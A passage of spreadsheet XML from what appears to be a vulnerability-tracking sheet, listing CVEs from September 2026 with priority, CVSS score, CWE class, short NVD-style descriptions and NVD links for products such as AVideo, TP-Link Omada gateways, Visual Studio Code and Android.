      <c r="F1184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1184" s="5" t="inlineStr"/>
      <c r="H1184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1184" s="5" t="inlineStr"/>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr"/>
      <c r="L1184" s="5" t="inlineStr"/>
      <c r="M1184" s="5" t="inlineStr"/>
      <c r="N1184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1184" s="5" t="inlineStr"/>
      <c r="Q1184" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R1184" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t>
        </is>
      </c>
      <c r="S1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86728</t>
        </is>
      </c>
      <c r="D1185" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E1185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1185" s="5" t="inlineStr"/>
      <c r="H1185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1185" s="5" t="inlineStr"/>
      <c r="J1185" s="5" t="inlineStr"/>
      <c r="K1185" s="5" t="inlineStr"/>
      <c r="L1185" s="5" t="inlineStr"/>
      <c r="M1185" s="5" t="inlineStr"/>
      <c r="N1185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1185" s="5" t="inlineStr"/>
      <c r="Q1185" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1185" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t>
        </is>
      </c>
      <c r="S1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="D1186" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1186" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1186" s="5" t="inlineStr"/>
      <c r="H1186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1186" s="5" t="inlineStr"/>
      <c r="J1186" s="5" t="inlineStr"/>
      <c r="K1186" s="5" t="inlineStr"/>
      <c r="L1186" s="5" t="inlineStr"/>
      <c r="M1186" s="5" t="inlineStr"/>
      <c r="N1186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1186" s="5" t="inlineStr"/>
      <c r="Q1186" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1186" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="S1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19683</t>
        </is>
      </c>
      <c r="D1187" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1187" s="5" t="inlineStr"/>
      <c r="H1187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1187" s="5" t="inlineStr"/>
      <c r="J1187" s="5" t="inlineStr"/>
      <c r="K1187" s="5" t="inlineStr">
        <is>
          <t>tp-link:dr3150, tp-link:dr3150_firmware, tp-link:dr3220v-4g, tp-link:dr3220v-4g_firmware, tp-link:dr3650v, tp-link:dr3650v-4g, tp-link:dr3650v-4g_firmware, tp-link:dr3650v_firmware, tp-link:er603wp-4g-outdoor, tp-link:er603wp-4g-outdoor_firmware</t>
        </is>
      </c>
      <c r="L1187" s="5" t="inlineStr"/>
      <c r="M1187" s="5" t="inlineStr"/>
      <c r="N1187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1187" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1187" s="5" t="inlineStr"/>
      <c r="Q1187" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R1187" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in the Dynamic DNS (DDNS) functionality of TP-Link Omada Gateways. During communication with a third-party DDNS service, authentication credentials are transmitted over an unencrypted channel. An attacker who can observe or manipulate traffic between an affected device and the DDNS service may obtain sensitive authentication information or interfere with DDNS update operations. Exploitation requires DDNS to be configured, communication with an external DDNS service, and attacker visibility or control of the relevant network path. 
Successful exploitation may result in disclosure of DDNS account credentials, unauthorized access to DDNS management functionality, or modification of DNS records associated with the affected deployment.</t>
        </is>
      </c>
      <c r="S1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19683</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62906</t>
        </is>
      </c>
      <c r="D1188" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1188" s="5" t="inlineStr"/>
      <c r="H1188" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1188" s="5" t="inlineStr"/>
      <c r="J1188" s="5" t="inlineStr"/>
      <c r="K1188" s="5" t="inlineStr"/>
      <c r="L1188" s="5" t="inlineStr"/>
      <c r="M1188" s="5" t="inlineStr"/>
      <c r="N1188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1188" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1188" s="5" t="inlineStr"/>
      <c r="Q1188" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R1188" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in Microsoft Discovery Studio allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62906</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="D1189" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1189" s="5" t="inlineStr"/>
      <c r="H1189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1189" s="5" t="inlineStr"/>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr"/>
      <c r="L1189" s="5" t="inlineStr"/>
      <c r="M1189" s="5" t="inlineStr"/>
      <c r="N1189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1189" s="5" t="inlineStr"/>
      <c r="Q1189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1189" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71375</t>
        </is>
      </c>
      <c r="D1190" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1190" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G1190" s="5" t="inlineStr"/>
      <c r="H1190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1190" s="5" t="inlineStr"/>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr"/>
      <c r="L1190" s="5" t="inlineStr"/>
      <c r="M1190" s="5" t="inlineStr"/>
      <c r="N1190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1190" s="5" t="inlineStr"/>
      <c r="Q1190" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1190" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity reference vulnerability in Cosminexus Component Container.
This issue affects Cosminexus Component Container: from 11-70-01 before 11-70-03, from 11-60 before 11-60-03, from 11-50 through 11-50-03, from 11-40 through 11-40-03, from 11-30 through 11-30-08, from 11-20 before 11-20-10, from 11-10 through 11-10-11, from 11-00 before 11-00-13, from 09-87 before 09-87-10, from 09-80 before 09-80-05, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="S1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76196</t>
        </is>
      </c>
      <c r="D1191" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1191" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G1191" s="5" t="inlineStr"/>
      <c r="H1191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1191" s="5" t="inlineStr"/>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr"/>
      <c r="M1191" s="5" t="inlineStr"/>
      <c r="N1191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1191" s="5" t="inlineStr"/>
      <c r="Q1191" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R1191" s="5" t="inlineStr">
        <is>
          <t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t>
        </is>
      </c>
      <c r="S1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="D1192" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1192" s="5" t="inlineStr"/>
      <c r="H1192" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1192" s="5" t="inlineStr"/>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L1192" s="5" t="inlineStr"/>
      <c r="M1192" s="5" t="inlineStr"/>
      <c r="N1192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1192" s="5" t="inlineStr"/>
      <c r="Q1192" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1192" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="D1193" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1193" s="5" t="inlineStr"/>
      <c r="H1193" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1193" s="5" t="inlineStr"/>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L1193" s="5" t="inlineStr"/>
      <c r="M1193" s="5" t="inlineStr"/>
      <c r="N1193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1193" s="5" t="inlineStr"/>
      <c r="Q1193" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R1193" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="D1194" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E1194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1194" s="5" t="inlineStr"/>
      <c r="H1194" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1194" s="5" t="inlineStr"/>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure\/msal-node</t>
        </is>
      </c>
      <c r="L1194" s="5" t="inlineStr"/>
      <c r="M1194" s="5" t="inlineStr"/>
      <c r="N1194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1194" s="5" t="inlineStr"/>
      <c r="Q1194" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R1194" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15431</t>
        </is>
      </c>
      <c r="D1195" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1195" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G1195" s="5" t="inlineStr"/>
      <c r="H1195" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1195" s="5" t="inlineStr"/>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr"/>
      <c r="L1195" s="5" t="inlineStr"/>
      <c r="M1195" s="5" t="inlineStr"/>
      <c r="N1195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1195" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1195" s="5" t="inlineStr"/>
      <c r="Q1195" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R1195" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability has been identified in the HP Support
 Assistant for versions prior to 9.53.2.0. The vulnerability
               could potentially allow a local attacker to escalate 
privileges due to insufficient access controls.</t>
        </is>
      </c>
      <c r="S1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15431</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="D1196" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1196" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1196" s="5" t="inlineStr"/>
      <c r="H1196" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1196" s="5" t="inlineStr"/>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L1196" s="5" t="inlineStr"/>
      <c r="M1196" s="5" t="inlineStr"/>
      <c r="N1196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1196" s="5" t="inlineStr"/>
      <c r="Q1196" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1196"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S1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="D1197" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1197" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1197" s="5" t="inlineStr"/>
      <c r="H1197" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1197" s="5" t="inlineStr"/>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L1197" s="5" t="inlineStr"/>
      <c r="M1197" s="5" t="inlineStr"/>
      <c r="N1197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1197" s="5" t="inlineStr"/>
      <c r="Q1197" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1197"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S1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="D1198" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1198" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1198" s="5" t="inlineStr"/>
      <c r="H1198" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1198" s="5" t="inlineStr"/>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L1198" s="5" t="inlineStr"/>
      <c r="M1198" s="5" t="inlineStr"/>
      <c r="N1198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1198" s="5" t="inlineStr"/>
      <c r="Q1198" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R1198"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S1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="D1199" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1199" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1199" s="5" t="inlineStr"/>
      <c r="H1199" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1199" s="5" t="inlineStr"/>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr"/>
      <c r="L1199" s="5" t="inlineStr"/>
      <c r="M1199" s="5" t="inlineStr"/>
      <c r="N1199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1199" s="5" t="inlineStr"/>
      <c r="Q1199" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="R1199"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S1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="D1200" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1200" s="5" t="inlineStr"/>
      <c r="H1200" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1200" s="5" t="inlineStr"/>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1200" s="5" t="inlineStr"/>
      <c r="M1200" s="5" t="inlineStr"/>
      <c r="N1200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1200" s="5" t="inlineStr"/>
      <c r="Q1200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1200" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D1201" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E1201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1201" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G1201" s="5" t="inlineStr"/>
      <c r="H1201" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1201" s="5" t="inlineStr"/>
      <c r="J1201" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K1201" s="5" t="inlineStr"/>
      <c r="L1201" s="5" t="inlineStr"/>
